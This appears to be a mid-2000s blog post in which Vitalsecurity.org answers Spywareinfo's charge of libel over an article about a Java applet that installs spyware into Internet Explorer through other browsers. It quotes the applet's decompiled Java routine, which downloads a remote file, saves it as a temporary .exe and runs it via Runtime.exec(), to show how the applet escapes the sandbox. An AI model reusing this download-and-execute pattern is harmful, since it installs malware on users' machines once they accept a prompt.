Spywareinfo slander Vitalsecurity..?
It's not often that a security site "attacks" another security site. However, another member site of ASAP (Spywareinfo) has taken it upon themselves to run our name through the mud in their newsletter. Instead of approaching us directly about something they may not have "got", they decided to stick the boot in through their newsletter which goes out to thousands of registered subscribers. The issue is (of course) the story regarding the Applet that bypasses whatever browser you happen to be using at the time, to infect IE (as long as the user is silly enough to click "yes").
For some reason, Mike Healan chose to crack off his wonderful missive without bothering to contact me directly first. Because of this, I will now have anything up to 17,000 people coming here and either
a) Hurling reams of abuse at me without actually reading anything, or
b) Reading the article and wondering why Spywareinfo.com is calling my site "libelous".
There's already a number of confused posters over at their forum, and the confusion is only likely to increase. So in the spirit of goodwill, I reproduce here Vitalsecurity.org's response to their March newsletter.
Spywareinfo - My frustration with this is that people are calling it a problem with Firefox. That is patently untrue. Every single browser is going to pop up a similar warning when it encounters this particular Java applet. If this had been labeled a problem with all web browsers, it still would be untrue, but at least it would not slander a particular browser. The people publishing this libelous nonsense should be ashamed of themselves and should print a prominent correction.
Libelous nonsense?
Presumably you mean me?
You must do, because you don't provide any other links in your newsletter. I don't know whether people are reading the wrong article here, but at all points in my piece I state quite clearly that the problem is caused by Java. I also point out that after testing, the Java applet works with most browsers out there. However, I give an example of what that Java applet does whilst using Firefox to illustrate the point that no browser is safe when a user agrees to something they shouldn't.
I'd also like to point out that, with Opera at least, the applet does not appear when running the newest version of Java. And when running an older version, its appearance is sporadic to say the least. See the Opera forums for more info.
Spywareinfo - This is not a problem with Firefox or with any other web browser.
In my opinion, this is a total cop out. Mozilla have now taken this problem on as a browser issue - they're now looking to "whitelist" Java applets in the same way software installs come from updates.mozilla.org. So if a browser vendor is seeing this as a browser issue and then attempting to fix it in tandem with Sun (which they are), then both our opinions of whether this is or isn't a browser issue don't really matter after that point.
The truly sad part is that none of the other affected browsers are following suit.
But if it's theoretically possible to fix a problem in a browser, then it's a browser issue, however you dress it up.
Spywareinfo - And to be honest, you'd have to be pretty dense to click "Yes" to such a prompt arriving out of nowhere.
That's a rather odd line for an antispyware site to take - pretending that many spyware installs don't occur as a result of user interaction! I can't believe that a "support forum" that wants to help people who do just that then goes and effectively calls them "dense". Why don't you just break the other golden rule of HJT forums and call them stupid for looking at porn sites too!
Spywareinfo - What is truly sad here is that the news sites I mentioned earlier are portraying this as a spyware targeting and infecting the Firefox web browser.
That last point is interesting - nowhere in the article does it state that Firefox is infected by anything.
From my site..
What if that same infection could get past not only FF (to infect IE), but a whole raft of other (supposedly more secure) browsers too?
From my site..
Firefox 1.0.1 - The install works.
Mozilla - The install works.
Avant browser 10.0 (build 153) - The install works.
Netscape 7.2 - The damn thing kept crashing, but eventually I was able to discover that the install works.
NetCaptor 7.5.4 - The install is blocked.
Opera 7.5.4 - The install is blocked.
In case you hadn't guessed by this point, the above is a list of browsers that will be bypassed when in use to infect IE if the user agrees to the install. And it turns out Opera comes out best of the bunch.
From my site...
So how is this happening? The developers of this install are using the Java Runtime Environment, the initial installer taking the form of a Java applet rather than an ActiveX component inherent to IE alone. In this way, if the browser being used can recognise and install the applet (to infect IE), then it doesn't seem to matter what browser you're using, or (more worryingly) how tight your IE security is.
In addition, the Register article is called "Alternative browser spyware infects IE".
The Register - Some useful citizen has created an installer that will nail IE with spyware, even if a surfer is using Firefox (or another alternative browser) or has blocked access to the malicious site in IE beforehand.
Hardly accusing Firefox of exclusive spyware, or even that the Spyware infects Firefox itself!
And in case you missed this bit, a direct quote from me. If you can spot the exact place where I exclusively blame Firefox you win a coconut:
Me - "The spyware installer is a Java applet powered by the Sun Java Runtime Environment, which allows them to whack most browsers out there (to infect IE), including Firefox, Mozilla, Netscape and others".
Finally, a direct quote from a visitor to my site regarding the Java sandbox:
// begin exploit
private void jbInit()
    throws Exception
{
    File file = File.createTempFile(app, ".exe");
    ByteArrayOutputStream bytearrayoutputstream = downloadFile(url);
    if(bytearrayoutputstream == null)
        throw new IOException("downloading was failed");
    String s = saveFile(bytearrayoutputstream, file);
    bytearrayoutputstream.close();
    String s1 = "";
    if(account_id != null && account_id.length() > 0)
        s1 = s1 + " /aid:" + account_id;
    if(download_key != null && download_key.length() > 0)
        s1 = s1 + " /key:" + download_key;
    if(download_lock != null && download_lock.length() > 0)
        s1 = s1 + " /lock:" + download_lock;
    if(cfg != null && cfg.length() > 0)
        s1 = s1 + " /cfg:" + cfg;
    if(sub != null && sub.length() > 0)
        s1 = s1 + " /sub:" + sub;
    Runtime.getRuntime().exec(file.getAbsolutePath() + s1);
}
// end exploit
The problem is that Runtime.exec() shouldn't even work from within the browser framework, dialog warnings or not. There is no SANDBOX when you allow this. Most people aren't aware that Java can do this.
In effect, the whole notion of a Sandbox goes out the window in any case.
My article quite clearly states that all of these browsers are bypassed when in use by the Java applet to nail IE.
So does The Register.
Some key points to summarise:
1) there's a "?" at the end of the title rather than a "!" or anything similar so it (should be!) obvious that there's more to it than just Firefox. It's a hook to guide the user in, play with their expectations and then reveal the true issue at hand. That's been quite a common tactic for some time - give a hoot and read a book, or check out a Hitchcock movie. You'll soon learn to get your head around such usage of the English language. If nothing else, the title quite reasonably explains that you can get IE infected whilst using another browser - in this case Firefox. To actually find out how, you have to read the article.
And on a final note regarding "sensationalism" - consider the following.
Try to summarise in a handful of words how you're going to describe a rather multi-levelled cross-browser exploit that depends on a number of different factors that all come together to nail IE. You need to keep it brief, give a hint of what is to come or be discussed (WITHOUT getting technical, as headlines like that simply make people read something else very quickly). You also need to try and get the connection in people's minds that the "safest browser ever" (at least in the public's mind) can be exploited (along with the user's trust) to install malware, both in IE and on the operating system (without IE actually being in use at the time).
Now, I've just had to use up a sizeable chunk of words in order to give a vaguely detailed, yet efficient summary of the main focus of the piece - that using FF will not necessarily prevent you falling into harm's way.
And what is my title?
"Firefox spyware infects IE?"
If someone can't immediately see that a question is being posed - note the question mark! - that immediately makes the connection between Firefox, spyware and the nailing of IE then I despair, I really do.
If the headline had had about five "!!!!!" at the end, then fair enough.
Now - consider the following headline and sample...
"Epidemic Of Firefox Spyware Infecting Computers Worldwide!"
"What is truly sad here is that the news sites I mentioned earlier are portraying this as a spyware targeting and infecting the Firefox web browser. These news sites are doing a grave disservice to their readers by misleading them."
I have repeatedly asked everyone who has seen that statement to find one place - one instance where I said that Firefox was infected with anything. It simply does not exist.
In addition, suggesting that there is a potential vector for attack in Firefox because of the way it allows an applet to function is not "libellous", as was stated - and to suggest so is attempting to shout down any criticism of a flaw that's been spotted, which does not help a browser vendor fix a problem.
2) Firefox is the security fanboy's darling browser - and I used FF to demonstrate the install. I also use it as my main browser, so there's a personal element to the story - much like the newsletter has a personal element, from the disclaimer below:
The contents of this newsletter is commentary. It should not be mistaken for unbiased, objective journalism.
Maybe some unbiased, objective journalism of my commentary would have been useful before sending that newsletter out...? Seems strange someone else can put their own slant on an issue but I am seemingly lambasted for doing so. The playing field seems rather uneven at this point.
3) In a weird self-fulfilling way, Mozilla have confirmed that (for them) it's a browser issue that they're exploring with a means to fixing, if at all possible - so I'm actually 100% bang on. Add to that it doesn't work on Opera with up to date Java installed and it's NOT a browser-wide problem, apparently. This has been explored in depth on the Opera forums.
4) A direct link has now been found to Firefox-specific .XPI files that attempt to load toolbars into IE. See here for more details. That last one kind of buries the argument once and for all, doesn't it?
How many people knew of this cross-browser Java install BEFORE I posted my article?
A handful of people on Tomcoyote.org, which is where it would have stayed.
How many people now know?
Thousands and thousands.
And of those people, a large amount who might have actually clicked "yes" to the install will now hopefully avoid doing so.
Believe me when I say, from where I'm standing, the only place hurling "libelous" comments appears to be Spywareinfo - and whilst I couldn't care less about personal attacks, you've taken a vast swing at the name of this site and everything it stands for.
The dictionary definition of "Libellous" is as follows:
"(used of statements) harmful and often untrue; tending to discredit or malign"
Thankfully, whilst my article title poses a question, you make a very definite statement, and a malignant one at that.
I think the site that needs to publish a correction is Spywareinfo.

